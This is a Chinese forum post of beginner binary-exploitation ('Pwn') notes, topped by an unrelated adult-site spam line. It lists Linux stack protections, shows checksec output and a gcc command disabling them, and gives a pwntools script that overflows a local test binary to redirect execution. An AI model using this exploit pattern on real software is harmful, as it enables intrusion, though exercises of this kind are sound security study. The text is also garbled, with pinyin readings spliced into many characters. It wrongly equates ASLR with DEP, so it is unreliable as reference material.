国产免费看av高清不卡,伊人久久大杳蕉综合牛牛

Pwn 學(xué)習(xí)第三課打卡！

Student 2023-5-23 940

原提問(wèn)者：
hackbs 2020-7-9

知識(shí)點(diǎn)：

①CANNARY(棧保護(hù)) ｛用來(lái)保護(hù)棧溢出，Cannary found表示開(kāi)了保護(hù)｝
②FORTIFY {比較冷門(mén)，防止緩沖區(qū)溢出}
③NX（DEP）｛不讓執(zhí)行ShellCode操作｝
④PIE（ASLR）｛Win上稱(chēng)為DEP 地址空間分布隨機(jī)化｝
⑤RELRO ｛設(shè)置符號(hào)重定向表格為只讀，綁定所有動(dòng)態(tài)符號(hào)，防止GOT攻擊｝

Linux下檢查保護(hù)機(jī)制的命令：

checksec  test
 
[*]  '/home/lee/test'
        Arch:          i386-32-little
        RELRO:        Partial  RELRO
        Stack:        No  canary  found
        NX:              NX  disabled
        PIE:            No  PIE  (0x8048000)
        RWX:            Has  RWX  segments

關(guān)閉所有保護(hù)編譯指令：

gcc  -no-pie  -fno-stack-protector  -z  execstack  -m32  -o  test  test.c
 
Exp:
from  pwn  import  *
#--------------------------------------
#init
testProcessHandle  =  process("./test")
 
#calc  ebp  offset
epbOffset  =  0x28  +  0x4
 
#exp  func  addresss
expAddress  =  0x08048456
 
#payload
payload  =  'A'  *  epbOffset  +  p32(expAddress)
#--------------------------------------
 
 
#  EntryPoint    Exp  Coding  By  Lee.
def  main():
        testProcessHandle.sendline(payload)
        testProcessHandle.interactive()
 
#  let's  go 
if  __name__  ==  "__main__":
        main()